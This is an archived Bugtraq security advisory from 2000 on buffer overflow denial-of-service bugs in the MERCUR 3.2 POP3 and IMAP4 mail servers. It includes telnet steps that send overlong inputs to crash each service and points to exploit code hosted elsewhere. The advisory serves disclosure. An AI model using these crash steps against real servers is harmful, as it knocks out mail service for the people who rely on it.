Bugtraq mailing list archives
Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability
From: labs () USSRBACK COM (Ussr Labs)
Date: Tue, 14 Mar 2000 04:12:24 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability USSR Advisory Code: USSR-2000035 Release Date: March 15, 2000 Systems Affected: MERCUR Mailserver 3.2 MERCUR POP3-Server (v3.20.01) for Windows 98/NT MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT THE PROBLEM UssrLabs found multiple places in MERCUR v3.20.* where they do not use proper bounds checking. The following all result in a Denial of Service against the service in question. Example: [hellme () die-communitech net$ telnet example.com 110 Trying example.com... Connected to example.com. Escape character is '^]'. +OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 M ar 2000 03:30:39 -0300 user (buffer) Where [buffer] is aprox. 2000 characters. [hellme () die-communitech net$ telnet example.com 143 Trying example.com... Connected to example.com. Escape character is '^]'. * OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300 (buffer) Where [buffer] is aprox. 3000 characters. Binary or source for this Exploit: http://www.ussrback.com/ Exploit: the Exploit, crash the remote machine service pop3 and imap Vendor Status: informed Vendor Url: http://www.atrium-software.com Program Url: http://www.atrium-software.com/mercur/mercur_e.html Credit: USSRLABS SOLUTION Noting yet. Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and Wiretrip. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOM3mWKVRYEYcg938EQIXsQCgmHUTL47TZHT77Z2jBi6G4kEQx/8AoPV3 p8SaqmGK9Dls6ujMJucLz4vq =CUnk -----END PGP SIGNATURE-----
Current thread:
- Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability Ussr Labs (Mar 13)